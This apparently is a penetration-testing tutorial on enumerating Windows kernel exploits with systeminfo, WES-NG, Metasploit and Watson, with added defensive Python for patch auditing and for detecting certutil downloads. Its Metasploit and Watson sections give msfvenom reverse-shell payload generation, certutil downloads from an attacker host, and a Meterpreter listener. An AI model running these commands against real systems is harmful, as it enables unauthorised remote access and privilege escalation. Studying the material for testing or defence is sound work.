MANUAL ENUMERATION

  1. Use the systeminfo command to collect detailed information about the system, including the OS version, system architecture, and installed hotfixes (KBs).
    systeminfo

    NOTE: In the provided output, we can identify the system as a Windows 7 Pro – Build 7601 – x64-based (64-bit). Additionally, it shows that three hotfixes have been installed on this host.

  2. To obtain more specific details about the installed hotfixes, use the following command:
    wmic qfe get Caption,Description,HotFixID,InstalledOn

    NOTE: Microsoft has moved away from MS bulletin numbers (e.g., “MS17-010”) for its disclosed vulnerabilities. Since late 2017/early 2018, Microsoft references vulnerabilities by their CVE (Common Vulnerabilities and Exposures) identifier, so modern kernel exploits are labeled with CVE-20XX-XXXX identifiers.
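    The two commands above produce the OS version, architecture and installed-hotfix list that every later step of this page depends on. As an added example (not part of the original page, and not code from WES-NG or any other tool named here), the Python below parses a constructed `systeminfo` output into a structured record, cross-checks the KB list against the count `systeminfo` itself declares, and reports which KBs from a patch baseline are missing. The sample output and the KB numbers (KB1111111 and similar) are constructed placeholders, not real update identifiers; the host description mirrors the Windows 7 Pro / Build 7601 / x64 / three-hotfix host described in the note.

```python
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Constructed sample of English-locale `systeminfo` output; not captured from a
# real host. It mirrors the host described above (Windows 7 Pro, Build 7601,
# x64, three hotfixes). The KB numbers are placeholders, not real update IDs.
SAMPLE_SYSTEMINFO = """\
Host Name:                 WIN7-PRO
OS Name:                   Microsoft Windows 7 Professional
OS Version:                6.1.7601 Service Pack 1 Build 7601
OS Manufacturer:           Microsoft Corporation
System Type:               x64-based PC
Time Zone:                 (UTC-08:00) Pacific Time (US & Canada)
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB1111111
                           [02]: KB2222222
                           [03]: KB3333333
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
"""

# Top-level fields are "Key:   value"; continuation lines are indented "[NN]: item".
FIELD_RE = re.compile(r"^(?P<key>[A-Za-z][^:]*?):\s+(?P<value>.*)$")
KB_RE = re.compile(r"\[\d+\]:\s*(KB\d+)", re.IGNORECASE)
BUILD_RE = re.compile(r"Build (\d+)")
COUNT_RE = re.compile(r"^(\d+) Hotfix")


@dataclass
class SystemInfo:
    os_name: str = ""
    os_version: str = ""
    build: str = ""
    system_type: str = ""
    declared_hotfix_count: int | None = None
    hotfixes: list[str] = field(default_factory=list)

    def consistent(self) -> bool:
        """True when the parsed KB list matches the count systeminfo declared."""
        return self.declared_hotfix_count == len(self.hotfixes)


def parse_systeminfo(text: str) -> SystemInfo:
    """Parse the top-level fields and the indented hotfix list."""
    info = SystemInfo()
    section = None  # name of the field whose continuation lines we are in
    for line in text.splitlines():
        m = FIELD_RE.match(line)
        if m and not line[:1].isspace():
            key, value = m.group("key"), m.group("value").strip()
            section = key
            if key == "OS Name":
                info.os_name = value
            elif key == "OS Version":
                info.os_version = value
                b = BUILD_RE.search(value)
                if b:
                    info.build = b.group(1)
            elif key == "System Type":
                info.system_type = value
            elif key == "Hotfix(s)":
                c = COUNT_RE.match(value)
                if c:
                    info.declared_hotfix_count = int(c.group(1))
            continue
        if section == "Hotfix(s)":
            k = KB_RE.search(line)
            if k:
                info.hotfixes.append(k.group(1).upper())
    return info


def missing_hotfixes(info: SystemInfo, required: set[str]) -> set[str]:
    """Required KBs (e.g. from a patch baseline) that the host does not report."""
    return {kb.upper() for kb in required} - set(info.hotfixes)


if __name__ == "__main__":
    parsed = parse_systeminfo(SAMPLE_SYSTEMINFO)
    print(parsed.os_name, "build", parsed.build, parsed.system_type)
    print("hotfixes:", parsed.hotfixes, "consistent:", parsed.consistent())
    # Placeholder baseline: KB4444444 is deliberately absent from the sample.
    print("missing:", missing_hotfixes(parsed, {"KB2222222", "KB4444444"}))
```

    The same parser works on a saved `systeminfo.txt` from a real host (English locale; field names differ in other locales), which makes it a quick patch-audit check on the defensive side: feed it the KB list your baseline requires and act on anything reported missing.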

ENUMERATING WITH WINDOWS EXPLOIT SUGGESTER

  1. Run the systeminfo command on the target machine to gather system information. Copy the output and save it to a TXT file on the attacker machine.

  2. Ensure you have the latest exploits by updating the WES-NG database:
    python3 wes.py --update

  3. Use WES-NG to analyze the gathered system information and identify potential kernel exploits:
    python3 wes.py systeminfo.txt -i 'Elevation of Privilege' --exploits-only

ENUMERATING WITH METASPLOIT

  1. Generate a reverse TCP Meterpreter payload based on the target's architecture (either x86 or x64) and save it as an executable file.
    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=[IP-ADDRESS] LPORT=1337 -f exe > shell-x64.exe

    NOTE: The built-in Local Exploit Suggester module in Metasploit can be used to identify potential kernel exploits.

  2. Host the payload binary using a Python HTTP server and transfer it to the target machine with certutil.
    certutil -urlcache -f http://[IP-ADDRESS]:8000/shell-x64.exe shell-x64.exe

  3. On the attacker machine, start a multi-handler listener in Metasploit with the following command:
    msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set LHOST tun0; set LPORT 1337; run"

  4. By executing the reverse shell binary, our multi-handler listener should receive a Meterpreter shell connection.
    .\shell-x64.exe

  5. Use the following commands in Metasploit to load the Local Exploit Suggester:

    background
    search suggester
    use 0
    set SESSION 1
    exploit
    

  6. After about 1 minute, Metasploit will provide a list of potential kernel exploits that can be used against the host.

ENUMERATING WITH WATSON

  1. Use one of the file transfer techniques from the File Transfer section to transfer Watson to the target machine.
    certutil -urlcache -f http://[IP-ADDRESS]:8000/Watson.exe Watson.exe

    NOTE: Watson supports various versions of Windows 10 (1507, 1511, 1607, 1703, 1709, 1803, 1809, 1903, 1909, 2004) and Windows Server (2016 & 2019).

  2. Once Watson is on the target machine, execute it and review the output.
    .\Watson.exe
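    Both the Metasploit and the Watson sections above stage their binary with `certutil -urlcache -f <URL> <file>`, so that command line is the obvious thing for the blue team to look for. As an added example (not part of the original page, and not a rule from any product), the Python below is a small detector that runs over process-creation command lines, recognises certutil being used to fetch a URL regardless of option case or full path, and extracts the URL and destination file. The sample command lines are constructed; 192.0.2.10 is an RFC 5737 documentation address, and only the certutil usage already shown on this page appears in them.

```python
from __future__ import annotations

import re
import shlex

# Constructed process-creation command lines (not from any real log); 192.0.2.10
# is an RFC 5737 documentation address. The first two are the certutil downloads
# shown on this page; the rest are incomplete or benign uses for contrast.
SAMPLE_CMDLINES = [
    "certutil -urlcache -f http://192.0.2.10:8000/Watson.exe Watson.exe",
    r"C:\Windows\System32\certutil.exe -UrlCache -F http://192.0.2.10:8000/shell-x64.exe shell-x64.exe",
    "certutil -urlcache http://192.0.2.10:8000/Watson.exe",
    "certutil -dump cert.cer",
    'powershell -c "Get-Date"',
]

URL_RE = re.compile(r"^https?://", re.IGNORECASE)
OPTION_PREFIXES = ("-", "/")  # certutil accepts either prefix for its options


def _basename(token: str) -> str:
    """Lower-cased file name of an executable token, with any path stripped."""
    return token.strip('"').replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect_certutil_download(cmdline: str) -> dict | None:
    """Return a finding when certutil is used to fetch a URL, else None.

    Options are compared case-insensitively because certutil accepts them in
    any case (e.g. -urlcache, -UrlCache, /URLCACHE).
    """
    try:
        # posix=False keeps Windows backslashes and quotes intact.
        argv = shlex.split(cmdline, posix=False)
    except ValueError:
        return None
    if not argv or _basename(argv[0]) not in ("certutil", "certutil.exe"):
        return None
    opts = {a[1:].lower() for a in argv[1:] if a[:1] in OPTION_PREFIXES}
    if "urlcache" not in opts:
        return None
    positional = [a for a in argv[1:] if a[:1] not in OPTION_PREFIXES]
    urls = [a for a in positional if URL_RE.match(a)]
    if not urls:
        return None
    # certutil -urlcache [-f] URL [outfile]: the trailing positional is the
    # destination; with no outfile certutil only fetches and displays the URL.
    dest = positional[-1] if len(positional) > 1 else None
    return {
        "url": urls[0],
        "dest": dest,
        "force_overwrite": "f" in opts,
        "cmdline": cmdline,
    }


def scan(cmdlines: list[str]) -> list[dict]:
    """Apply the detector to a batch of command lines and keep the findings."""
    return [f for f in map(detect_certutil_download, cmdlines) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_CMDLINES):
        print(f"{finding['url']} -> {finding['dest']} (force: {finding['force_overwrite']})")
```

    Feed it the command-line field of Sysmon Event ID 1 or Security Event ID 4688 (the latter carries the command line only when the "Include command line in process creation events" policy is enabled). certutil has legitimate certificate-management uses, so the match on `-urlcache` together with an `http(s)://` argument, rather than on the binary name alone, is what keeps the rule from paging on routine PKI activity.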